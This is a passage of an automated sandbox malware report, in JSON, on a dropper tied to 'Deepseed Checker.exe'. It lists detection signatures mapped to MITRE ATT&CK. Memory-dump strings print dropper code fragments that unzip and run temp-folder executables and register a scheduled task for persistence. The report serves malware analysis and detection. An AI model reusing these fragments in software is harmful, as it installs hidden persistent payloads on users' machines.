name: \"CosmicBinder.Resources.File2.exe\" size: \"4076032\" and abnormal entropy:\"7.9538705449\"\n Deepseed Checker.exe has big resource with name: \"Update\" size: \"948044\" and abnormal entropy:\"7.99981433115\"\n Deepseed Checker.exe has big resource with name: \"_1\" size: \"7670492\" and abnormal entropy:\"7.95857634215\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-174", "relevance": 1, "name": "Contains ability to perform code compilation at runtime (Dotnet)", "description": "Observed namespace \"Microsoft.CSharp.CSharpCodeProvider\" and TypeReference \".ctor\" in \"Deepseed Checker.exe\"", "origin": "Static Parser", "attck_id": "T1027.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/004"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadResource with parameter {'hModule': '1991770112', 'hResInfo': '11552712'}\" (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadResource with parameter {'hModule': '1991770112', 'hResInfo': '11552696'}\" (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadResource with parameter {'hModule': '1869086720', 'hResInfo': '1869095040'}\" (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindResourceW\" with parameter \"789\" - (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"SetUnhandledExceptionFilter\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300282639000f00010e1a80000e63006f006e00660069006700750072006100740069006f006e00000055004200570053005c0041000b00000b6080000040a3390088bb38006f00630061006c005c00500072006f0067007200 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb2a7640e842000050fd7f9a5ca67700e0fa7f40c04c054450fd7f00000000400000003f000000280000000050fd7f34c04c05c15ca6776082ad77280000000050fd7f9a5ca67700e0fa7f58c04c055789a5778083ad771317b175d8eb2a76 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b20310000fcb57e05100000001c00000058d84c055cd94c057ac8d96f08000000ac4ea4779379b075ffffffffc0d84c0500000000acd84c05001000000400000000200000ccd84c05bf79b075ffffffff0000d2000000d200001000000400000004d94c0500004d056ee9ad6f0000d200ff000000 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100205061636b20310000fcb57e05100000001c00000058d84c055cd94c057ac8d96f08000000ac4ea4779379b075ffffffffc0d84c0500000000acd84c05001000000400000000200000ccd84c05bf79b075ffffffff0000d2000000d200001000000400000004d94c0500004d056ee9ad6f (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100205061636b203100205061636b20310000fcb57e05100000001c00000058d84c055cd94c057ac8d96f08000000ac4ea4779379b075ffffffffc0d84c0500000000acd84c05001000000400000000200000ccd84c05bf79b075ffffffff0000d2000000d200001000000400000004d94c05 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000094b47e05100000001c000000f8d94f05fcda4f057ac8d96f08000000ac4ea4779379b075ffffffff60da4f05000000004cda4f050010000004000000002000006cda4f05bf79b075ffffffff00005904000059040010000004000000a4da4f05000050056ee9ad6f00005904ff000000 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100205061636b2031000094b47e05100000001c000000f8d94f05fcda4f057ac8d96f08000000ac4ea4779379b075ffffffff60da4f05000000004cda4f050010000004000000002000006cda4f05bf79b075ffffffff00005904000059040010000004000000a4da4f05000050056ee9ad6f (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100205061636b203100205061636b2031000094b47e05100000001c000000f8d94f05fcda4f057ac8d96f08000000ac4ea4779379b075ffffffff60da4f05000000004cda4f050010000004000000002000006cda4f05bf79b075ffffffff00005904000059040010000004000000a4da4f05 (UID: 00000000-00003276)\n \"Deepseed Checker.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100372c2c4973576f77363450726f636573732c6b65726e656c33322e646c6c2c223235323a30383a35342e343230222c52583d302c50583d30003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002512)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"Deepseed Checker.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-120", "relevance": 1, "name": "Contains ability to gather system information (Dotnet)", "description": "Observed function \"get_UserName\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"\n Observed function \"get_MachineName\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"\n Observed function \"get_MachineName\" in \"Deepseed Checker.exe\"\n Observed function \"get_OSVersion\" in \"Deepseed Checker.exe\"", "origin": "Static Parser", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-659", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using API string", "description": "Found string \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00003276-00000C29-410204178\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-89", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about the current system (API string)", "description": "Found reference to API \"RtlNtStatusToDosError\" (Indicator: \"RtlNtStatusToDosError\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" queries volume information of \"C:\\8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" at 00000000-00003276-0000010C-3385485\n \"Deepseed Checker.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hAifIHNdlq\\Deepseed Checker.exe\" at 00000000-00002512-0000010C-2690498", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"Deepseed Checker.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\UPDATE.EXE\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\UPDATE.EXE\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\DEEPSEED CHECKER.EXE\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\DEEPSEED CHECKER.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000074013600000000000600000000000000500136001a000000c00b3a00000000001a000000000000001400000000000000000000000000000000000000000000000200000240a33900630400670000000000000000000000008000000000000000852a00afa8e439000100000000000000020000000c000000f09f3900f09f3900eb9f390000000000000000000000360000000001f4ee27000000000014f5270095e1a1772bb11d00feffffff435ca5775059a57794000000a0000000ea9f3900e89f39009400000098f02700fdfef27518000000e92b26a5c3860d6dc8012700 (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"IsWow64Process\" with parameter \"3276\" - (UID: 00000000-00003276)\n \"Deepseed Checker.exe\" called \"IsWow64Process\" with parameter \"2512\" - (UID: 00000000-00002512)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"Deepseed Checker.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n file/memory contains long string with (Indicator: \"GetTempPath\"; File: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"GetCurrentDirectoryW\" (Indicator: \"GetCurrentDirectory\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API \"GetFileInformationByHandle\" (Indicator: \"GetFileInformationByHandle\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API \"GetFileInformationByHandleEx\" (Indicator: \"GetFileInformationByHandle\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"using (ZipFile zip = ZipFile.Read(Path.Combine(Path.GetTempPath(), \"Update.zip\")))\" (Indicator: \"GetTempPath\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"zip.ExtractAll(Path.GetTempPath(), ExtractExistingFileAction.OverwriteSilently);\" (Indicator: \"GetTempPath\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"Run(Path.Combine(Path.GetTempPath(), \"CompPkgSrv.exe\"));\" (Indicator: \"GetTempPath\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"Run(Path.Combine(Path.GetTempPath(), \"Update.exe\"));\" (Indicator: \"GetTempPath\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"td.Actions.Add(new ExecAction(Path.Combine(Path.GetTempPath(), \"CompPkgSrv.exe\")));\" (Indicator: \"GetTempPath\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"RNGCryptoServiceProvider\" (Indicator: \"rngcryptoserviceprovider\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found string \"System.Security.Cryptography\" (Indicator: \"System.Security.Cryptography\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n file/memory contains long string with (Indicator: \"zipfile\"; File: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found string \"using (ZipFile zip = ZipFile.Read(Path.Combine(Path.GetTempPath(), \"Update.zip\")))\" (Indicator: \"zipfile\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-507", "type": 2, "relevance": 1, "name": "References to WMI query strings used for information discovery", "description": "Found string \"/C wmic path win32_ComputerSystem get model\" (Indicator: \" Win32_ComputerSystem\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 